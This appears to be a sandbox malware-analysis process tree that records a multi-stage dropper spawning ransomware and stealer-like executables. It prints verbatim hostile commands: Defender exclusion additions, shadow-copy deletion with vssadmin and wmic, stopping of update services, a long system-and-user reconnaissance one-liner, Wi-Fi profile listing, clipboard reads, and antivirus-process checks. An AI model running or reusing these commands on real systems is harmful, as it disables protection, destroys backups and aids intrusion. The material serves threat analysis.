                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\11.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\11.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Windows directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4948
                                                                                              • C:\Windows\sysarddrvs.exe
                                                                                                C:\Windows\sysarddrvs.exe
                                                                                                5⤵
                                                                                                • Modifies security service
                                                                                                • Windows security bypass
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Windows security modification
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                PID:7008
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                  6⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4928
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:6460
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                                                                  6⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4312
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop UsoSvc
                                                                                                    7⤵
                                                                                                    • Launches sc.exe
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:9408
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop WaaSMedicSvc
                                                                                                    7⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:3880
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop wuauserv
                                                                                                    7⤵
                                                                                                    • Launches sc.exe
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:9740
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop DoSvc
                                                                                                    7⤵
                                                                                                    • Launches sc.exe
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:9256
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop BITS
                                                                                                    7⤵
                                                                                                    • Launches sc.exe
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:10064
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\s.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:736
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6436
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\SVC.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\SVC.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:8572
                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                C:\Windows\system32\WerFault.exe -u -p 8572 -s 740
                                                                                                5⤵
                                                                                                  PID:6072
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\SolaraBootstrapper.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\SolaraBootstrapper.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:6272
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\build.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:7860
                                                                                                • C:\Users\Admin\AppData\Local\Temp\onefile_7860_133702333999139568\stub.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:6788
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "ver"
                                                                                                    6⤵
                                                                                                      PID:6380
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                      6⤵
                                                                                                        PID:4660
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic csproduct get uuid
                                                                                                          7⤵
                                                                                                            PID:6680
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                          6⤵
                                                                                                            PID:9840
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist
                                                                                                              7⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              PID:8236
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                                                                                            6⤵
                                                                                                              PID:6932
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                                                                                              6⤵
                                                                                                                PID:8908
                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                  taskkill /F /IM chrome.exe
                                                                                                                  7⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:7632
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                6⤵
                                                                                                                  PID:5956
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    tasklist /FO LIST
                                                                                                                    7⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    PID:8120
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                  6⤵
                                                                                                                  • Clipboard Data
                                                                                                                  PID:7300
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell.exe Get-Clipboard
                                                                                                                    7⤵
                                                                                                                    • Clipboard Data
                                                                                                                    PID:8004
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                                                                                  6⤵
                                                                                                                    PID:4460
                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                      chcp
                                                                                                                      7⤵
                                                                                                                        PID:8868
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                                                                                      6⤵
                                                                                                                        PID:10136
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp
                                                                                                                          7⤵
                                                                                                                            PID:8960
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                          6⤵
                                                                                                                          • Network Service Discovery
                                                                                                                          PID:8020
                                                                                                                          • C:\Windows\system32\systeminfo.exe
                                                                                                                            systeminfo
                                                                                                                            7⤵
                                                                                                                            • Gathers system information
                                                                                                                            PID:7192
                                                                                                                          • C:\Windows\system32\HOSTNAME.EXE
                                                                                                                            hostname
                                                                                                                            7⤵
                                                                                                                              PID:640
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic logicaldisk get caption,description,providername
                                                                                                                              7⤵
                                                                                                                              • Collects information from the system
                                                                                                                              PID:8328
                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                              net user
                                                                                                                              7⤵
                                                                                                                                PID:5736
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 user
                                                                                                                                  8⤵
                                                                                                                                    PID:9412
                                                                                                                                • C:\Windows\system32\query.exe
                                                                                                                                  query user
                                                                                                                                  7⤵
                                                                                                                                    PID:6632
                                                                                                                                    • C:\Windows\system32\quser.exe
                                                                                                                                      "C:\Windows\system32\quser.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:9120
                                                                                                                                    • C:\Windows\system32\net.exe
                                                                                                                                      net localgroup
                                                                                                                                      7⤵
                                                                                                                                        PID:10160
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 localgroup
                                                                                                                                          8⤵
                                                                                                                                            PID:212
                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                          net localgroup administrators
                                                                                                                                          7⤵
                                                                                                                                            PID:8652
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 localgroup administrators
                                                                                                                                              8⤵
                                                                                                                                                PID:6600
                                                                                                                                            • C:\Windows\system32\net.exe
                                                                                                                                              net user guest
                                                                                                                                              7⤵
                                                                                                                                                PID:7160
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 user guest
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5732
                                                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                                                  net user administrator
                                                                                                                                                  7⤵
                                                                                                                                                    PID:9364
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 user administrator
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7668
                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                      wmic startup get caption,command
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5264
                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                        tasklist /svc
                                                                                                                                                        7⤵
                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                        PID:9464
                                                                                                                                                      • C:\Windows\system32\ipconfig.exe
                                                                                                                                                        ipconfig /all
                                                                                                                                                        7⤵
                                                                                                                                                        • Gathers network information
                                                                                                                                                        PID:8220
                                                                                                                                                      • C:\Windows\system32\ROUTE.EXE
                                                                                                                                                        route print
                                                                                                                                                        7⤵
                                                                                                                                                          PID:6284
                                                                                                                                                        • C:\Windows\system32\ARP.EXE
                                                                                                                                                          arp -a
                                                                                                                                                          7⤵
                                                                                                                                                          • Network Service Discovery
                                                                                                                                                          PID:3244
                                                                                                                                                        • C:\Windows\system32\NETSTAT.EXE
                                                                                                                                                          netstat -ano
                                                                                                                                                          7⤵
                                                                                                                                                          • System Network Connections Discovery
                                                                                                                                                          • Gathers network information
                                                                                                                                                          PID:7880
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc query type= service state= all
                                                                                                                                                          7⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:6412
                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                          netsh firewall show state
                                                                                                                                                          7⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                          PID:4792
                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                          netsh firewall show config
                                                                                                                                                          7⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                          PID:4848
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                        6⤵
                                                                                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                        PID:9984
                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                          netsh wlan show profiles
                                                                                                                                                          7⤵
                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                          PID:7940
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1836
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            wmic csproduct get uuid
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5064
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:1276
                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:6256
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Files\66d4d0780772b_vnew.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Files\66d4d0780772b_vnew.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:9704
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:8448
                                                                                                                                                              • C:\ProgramData\ECFHJKEBAA.exe
                                                                                                                                                                "C:\ProgramData\ECFHJKEBAA.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:6192
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5828
                                                                                                                                                              • C:\ProgramData\BFBKFHIDHI.exe
                                                                                                                                                                "C:\ProgramData\BFBKFHIDHI.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5288
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  PID:3708
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAKFIDHDGIEG" & exit
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:8532
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 10
                                                                                                                                                                    7⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:9184
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\1.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              PID:3760
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\Files\1.exe > nul
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                PID:3056
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping -n 2 127.0.0.1
                                                                                                                                                                  6⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:7536
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\PctOccurred.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\PctOccurred.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:5720
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
                                                                                                                                                                5⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5444
                                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                  tasklist
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:6664
                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                  findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:1436
                                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                  tasklist
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:7472
                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                  findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:7792
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /c md 193997
                                                                                                                                                                  6⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:9140
                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                  findstr /V "JulieAppMagneticWhenever" Hist
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:1028
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
                                                                                                                                                                    6⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:6016
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
                                                                                                                                                                    Restructuring.pif y
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:9128
                                                                                                                                                                  • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                    choice /d y /t 5
                                                                                                                                                                    6⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:9644
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:2356
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\tt.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\tt.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:8564
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:8408
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:4416
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1088
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:8412
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\asena.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\asena.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                  • Writes to the Master Boot Record (MBR)
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:3088
                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                    wmic.exe shadowcopy delete
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:2720
                                                                                                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                    PID:3964
                                                                                                                                                                  • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                    C:\Users\Public\Documents\RGNR_7C49C94F.txt
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                                                                    PID:1120
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Bomb.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Bomb.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                  PID:2640
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\25.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\25.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Drops startup file
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4572
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\25.exe'
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:5996
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '25.exe'
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6392
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:9900
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6356
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\24.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\24.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Drops startup file
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:4648
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\24.exe'
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5512
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24.exe'
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:8468
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:9920
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:260
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\23.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\23.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:3492
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\23.exe'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5672
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '23.exe'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:5452
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:5408
